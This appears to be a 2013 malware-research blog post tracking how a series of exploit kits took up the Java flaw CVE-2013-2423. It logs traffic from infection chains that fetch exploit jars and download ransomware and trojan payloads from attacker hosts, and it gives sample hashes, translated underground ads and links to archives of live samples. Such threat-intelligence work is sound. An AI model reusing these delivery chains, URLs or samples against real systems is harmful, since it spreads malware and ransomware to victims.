2013-04-23 - Exploit Integration
CVE-2013-2423 integrating Exploit Kits
One week after Patch Java7u21 the vulnerability is being exploited in mass blind attack.
( First alert come from Timo Hirvonen with CrimeBoss and later CritXPack/SafePack. Will update for these EK as soon as i land on it)
Cool EK:
 |
| CVE-2013-2423 successful path in Cool EK 2013-04-23 |
GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm
200 OK (text/html)
GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar
200 OK (application/java-archive) 9339cb68dd4a1301f8b84da55bacd6b4
 |
| CVE-2013-2423 in Cool EK Jar |
GET http://95.211.[bip]/getqq.jpg c795ac9a7a84930c4da54439026556c6 Reveton as usual.
200 OK (application/x-msdownload)
<edit1 2013-04-26>
Sweet-Orange :
 |
| CVE-2013-2423 positive path in Sweet Orange 2013-04-26 |
200 OK (text/html)
<edit5 2013-04-27> Security Bypass has been added.
Looks like that :
 |
| Security bypass implemented in Sweet Orange 2013-04-27 |
</edit5>
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/bDCoZGmn.jar
200 OK (application/x-java-archive) d4a716a6434462ddd1b99a85f3d9cf87
 |
| CVE-2013-2423 in SWT |
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/KOrJjsK.jar
200 OK (application/x-java-archive) 49ca9dcbf4cc7176bb656ded3eb03dba
GET http://prioritiesinformationlockdown .net/iraq.php?setup=750&humor=598&star=4&virus=629&entry=171&paper=545&stars=451&intm=257&books=550&myguest=958
200 OK (application/octet-stream) Decoded payload : f94c16dc1c399849e37064e17c5337e1 (Ransomware c&c http://utrento .com/picture.php )
 |
| Undefined (for now) Ransomware landing for UK |
<edit3 2013-04-27>
Neutrino :
"Добавлен новый эксплоит, пробив приятно поднялся ;)"
translated as :
Added a new exploit, breaking up nicely ;)
 |
| CVE-2013-2423 in Neutrino 2013-04-27 with Security Bypass |
 |
| Security Bypass (as explained by Security Immunity) in Neutrino after some decoding |
 |
| Jnlp After Base64 decode |
GET http://evaluation-man .net/ldeiyxlmeiujjn?fqemlffr=5884689
200 OK (text/html)
GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)
GET http://evaluation-man .net/scripts/js/plugin_detector.js
200 OK (application/x-javascript)
POST http://evaluation-man .net/cvwrssa
200 OK (text/html)
GET http://evaluation-man .net/eqtmw?hvvsxlyebdkj=517ba030aaa2cc8561032cc5
200 OK (application/java-archive) 4387db4a1da8f8f68df4369f8e6d46b6
 |
| CVE-2013-2423 in Neutrino Jar |
GET http://evaluation-man .net/puvpdxcfdwntco?htigpfblxyx=517ba030aaa2cc8561032cc5
200 OK (application/octet-stream) Decoded payload : a69ffadf3d021f3edfb7b811e2fcb753 Urausy
 |
| Part of Urausy LU Design 2013-04-27 |
File: Neutrino_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit3>
<edit4 2013-04-27>
Sakura :
 |
| CVE-2013-2423 & Security Bypass successful path in Sakura EK |
200 OK (text/html)
 |
| Security Bypass in Sakura (after partial deobfus) - 2013-04-27 |
GET http://ef4g.stencilmaster1 .com:88/page/important_whole_mile.php
200 OK (application/x-java-archive) b7c19737bcbeb0613ade20b71e2797fe
 |
| CVE-2013-2423 in Sakura Jar file 2013-04-27 |
200 OK (application/octet-stream) Decoded payload : 1ecc8081e6fe50c886735c45e788d16d
 |
| Part of Urausy NL Design 2013-04-27 |
Files : Sakura_Landing_Jar_Payload_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit4>
<edit6 2013-04-27>
Styx :
At least 3 hours providing that jar without infecting...it appears now to be fully operationnal
 |
| Successful CVE-2013-2423 + Security bypass in Styx + Payload Urausy Call Home |
200 OK (text/html)
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/jrr.html
200 OK (text/html)
 |
| Embedded jnlp for Security Bypass |
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/sdghsHHj.jar
200 OK (text/html) 702ad790017148b8eedd46ce5599a06f
 |
| CVE-2013-2423 in Styx Jar 2013-04-27 |
GET http://1perfotas.gotgeeks .com/OoTtsV0poEU0xnad0KaY910BMP0MRvW0emfi0nW3n0rEFd06afI0di5J0QjCx0OufD06IHF0CViI0ZVum0V3tm0zzAk14xMn0TcLD01PmR0nee80H9JU0Rdwk12WwY09mps0ZYSm0nX5o0OhKa17Z8N16eY5126Nc0hQ6m0ML3m0gjjR0EYoV0tEYB14CSM0GpRt0unAj0dUrn0vhxG0htLK12MMq0SNVP0OGdP/Er3jvhs7jf.exe?fJ2pf=XUaPp&h=13
200 OK (application/octet-stream) Payload decoded (for now...) 1f9d504d0c3ad25ca42fbc661070d075 Urausy again...
 |
| Part of Urausy US Design 2013-04-27 |
</edit6>
<edit7 2013-04-30>
Redkit:
Spotted by @UnicornSec on 2013-04-29 |
| CVE-2013-2423 in Redkit 2013-04-30 |
200 OK (text/html)
GET http://electricfireplaceheater .net/roh.jnlp
200 OK (text/html)
GET http://electricfireplaceheater .net/aae.jnlp
200 OK (text/html)
 |
| Redkit jnlp for Security Bypass 2013-04-30 |
GET http://electricfireplaceheater .net/qv3.jar
200 OK (application/java-archive) 5623b9a385e3eec21bf4d5d2fe63e45d
 |
| CVE-2013-2493 in Redkit Jar 2013-04-30 |
200 OK (application/octet-stream)
Out of scope but here are the Payloads :
1: 8586611fc023048abac469bfe681117b 2: cf0ae96521b423ebe10593e7de1f6a9c (it's Karagny i think)
3: b9e6d133e163b0d0e4efb144316d528e 4: 280683d62667a7bd8411565fd212707f
5: 5de26a11e59a84368db5f56cc9c997cc Zaccess 6: 13bd23da493896001f6d107f1bf1afc0
Files : Redkit_CVE-2013-2423_2013-04-30.zip (OwnCloud via goo.gl)
Nuclear Pack :
Announced on multiple underground forum since 2013-04-27
добавлен новый Java exploit
пробив увеличился в 2 раза!!
Работает тих без окон!!!
Translated by google as :
added a new Java exploit
breaking increased by 2 times!
Runs quiet with no windows!
Thanks Chris Wakelin who spotted it and shared referrer
 |
| CVE-2013-2423 successful path In Nuclear Pack 2013-04-30 |
200 OK (text/html)
http://wepawet.iseclab.org/view.php?hash=6d3b3650005593ab6955750c2f7e2097&type=js
 |
| Landings interpreted by Wepawet |
 |
| Base64 decode of the Security Bypass "zone" |
200 OK (application/java) ac29a615ec7ff5d3f238effca6e9095d
 |
| CVE-2013-2423 in a Nuclear Pack jar 2013-04-30 |
200 OK (application/octet-stream) a2fcdd67062b8cd866b4a642277f24e2 Citadel
GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2/2
200 OK (application/octet-stream)
SofosFO/StampEK :
 |
| CVE-2013-2423 positive path in SofosFO/Stamp EK |
200 OK (text/html)
GET http://cubicle.zeusfte .biz/kkethh1yogmrErparmDQGwe4gerparGg/FGZa2../prosperity.php5
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/901212121255
200 OK (text/html)
 |
| Security Bypass in SofosFO/Stamp EK 2013-04-30 |
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/9013312341/double.jar
200 OK (application/java-archive)
 |
| CVE-2013-2423 part in jar from SofosFO/StampEK |
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/95555555555551/1704114
200 OK (application/java-archive) Decoded Payload : 0bfc916bd2c95a98234b19c8976686a5 (Reveton...seems Cool EK is facing troubles. Distribution moved to SofosFO and Sweet Orange).
 |
| Piece of Reveton FR Design 2013-04 |
 |
| Connexion to Reveton C&C 2013-04-30 |
Entry point: FG00
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/MyApplet.class
200 OK (text/html)
Files : SofosFO_CVE-2013-2423_Reveton_SecuByP.zip (OwnCloud via goo.gl)
</edit7>
<edit8 2013-05-01>
Sibhost :
 |
| CVE-2013-2423 successful path in Sibhost (Urls Removed cause it's a "forged" link) |
200 OK (text/html)
 |
| Security Bypass (embedded jnlp in the landing) in Sibhost 2013-05-01 |
GET http://[Redacted]/deployJava.js
200 OK (application/javascript)
GET http://[Redacted]/deployJava.js
200 OK (application/javascript)
GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu2.zip
200 OK (application/octet-stream) e041223ecd039e5a01f8e4cac5ca9c96
 |
| CVE-2013-2423 in Sibhost Jar 2013-05-01 (including encoded payload - Urausy) |
Decoded payload : 3bce54da0e5a8f1c56787c60b389ff56 (Urausy as always on this Exploit kit)
 |
| Part of Urausy LU design 2013-05-01 |
POST http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu?id=2
200 OK (text/html) (<- stats call back)
</edit8>
<edit 9 2013-05-06>
WhiteHole :
 |
| CVE-2013-2423 in WhiteHole 2013-05-06 |
200 OK (text/html)
 |
| Security Bypass in WhiteHole 2013-05-06 |
GET http://1367825417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)
GET http://1367825417.hopto .org/temp/newyear/2b075/?java=98
200 OK (text/html)
GET http://1367825417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) b36e2a4326d80fdd605650363cae50a9
GET http://1367825417.hopto .org/temp/newyear/JavaZ.jar?java=98
200 OK (application/java-archive) a46b973d293fc787905a0d6d9d103eb3 < CVE-2013-2423
 |
| CVE-2013-2423 in WhiteHole Jar |
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=98
302 Found to http://1367825417.hopto.org/temp/softl98ii.exe
GET http://1367825417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 1d7dc35322dcc21e84bd72eafc2b167d < Urausy
 |
| Part of Urausy BE Design 2013-05-06 |
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=98
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9802
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9802
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9803
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9803
504 Gateway Time-out (text/html)
Files : WhiteHole_CVE-2013-2423.zip (OwnCloud via Goo.gl)
</edit9>
Reading :
CVE-2013-2423 on mitre
CVE-2013-2423 Metasploit Module
Java is So Confusing... - Trustwave/Spiderlabs - Anat Davidi -2013-04-19
Java 7 Update 21 - IKVM.Net Weblog - 2013-04-17
Post Publication Readings :
Yet Another Java Security Warning Bypass - Immunity - 2013-04-24 - Esteban Guillardoy
The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) - Security Obscurity - 2013-04-26
K.I.A. – Java CVE 2013-2423 Via New and Improved Cool EK - Anup Ghosh - Invincea - 2013-04-26